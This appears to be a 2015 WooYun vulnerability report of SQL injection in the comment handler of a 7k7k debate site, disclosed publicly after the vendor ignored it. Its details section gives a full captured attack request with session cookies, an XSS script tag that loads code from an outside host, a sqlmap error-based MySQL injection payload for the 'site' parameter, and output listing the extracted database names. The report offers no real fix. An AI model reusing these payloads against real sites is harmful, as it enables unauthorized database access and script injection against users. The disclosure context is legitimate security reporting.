当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096669

漏洞标题:7k7k某站存在SQL注入

相关厂商:奇客星空

漏洞作者: 小邪

提交时间:2015-02-10 19:05

修复时间:2015-02-15 19:06

公开时间:2015-02-15 19:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

有木有礼物啊= =

详细说明:

bbbbbb.jpg


问题处:http://bianlun.7k7k.com/comment_pk.htm?pkid=52
举报 抓包

POST /comment.php HTTP/1.1
Host: bianlun.7k7k.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://bianlun.7k7k.com/comment_pk.htm?pkid=52
Content-Length: 118
Cookie: referer_url=http%3A%2F%2Fwww.wooyun.org%2Fbugs%2Fwooyun-2010-068719; Hm_lvt_4f1beaf39805550dd06b5cac412cd19b=1423561098; Hm_lpvt_4f1beaf39805550dd06b5cac412cd19b=1423562720; Hm_lvt_f6d2aab8cf3e9662dce98ba558d6c2c0=1423561099; Hm_lpvt_f6d2aab8cf3e9662dce98ba558d6c2c0=1423562247; timekey=2877ca9a7d4bb6cb8289f1a79be3ad32; username=1617059159; identity=1617059159; nickname=tianjian; userid=546392330; kk=1617059159; logintime=1423561155; k7_lastlogin=1423562412; loginfrom=0100; avatar=http%3A%2F%2Fsface.7k7kimg.cn%2Fuicons%2Fphoto_default_s.png; securitycode=36da0e629740e762b6403b0756825cfd; CNZZDATA30008588=cnzz_eid%3D1273968121-1423560030-%26ntime%3D1423560030; CNZZDATA30036913=cnzz_eid%3D100425878-1423561720-%26ntime%3D1423561720
X-Forwarded-For: '
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=report&site=0&aid=0&pid=183939&reason=%3Cscript%20src%3Dhttp%3A//xss.re/6474%3E%3C/script%3E&t=1423563129035


POST下参数site存在注入

漏洞证明:

Place: POST
Parameter: site
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=report&site=0' AND (SELECT 3815 FROM(SELECT COUNT(*),CONCAT(
0x3a7264733a,(SELECT (CASE WHEN (3815=3815) THEN 1 ELSE 0 END)),0x3a6771653a,FLO
OR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bIaT'=
'bIaT&aid=0&pid=183939&reason=<script src=http://xss.re/6474></script>&t=1423563
129035
---
[18:09:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.3
back-end DBMS: MySQL 5.0
[18:09:33] [INFO] fetching database names
[18:09:33] [INFO] the SQL query used returns 2 entries
[18:09:33] [INFO] retrieved: information_schema
[18:09:34] [INFO] retrieved: k7pl
available databases [2]:
[*] information_schema
[*] k7pl

修复方案:

你懂的

版权声明:转载请注明来源 小邪@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-15 19:06

厂商回复:

最新状态:

暂无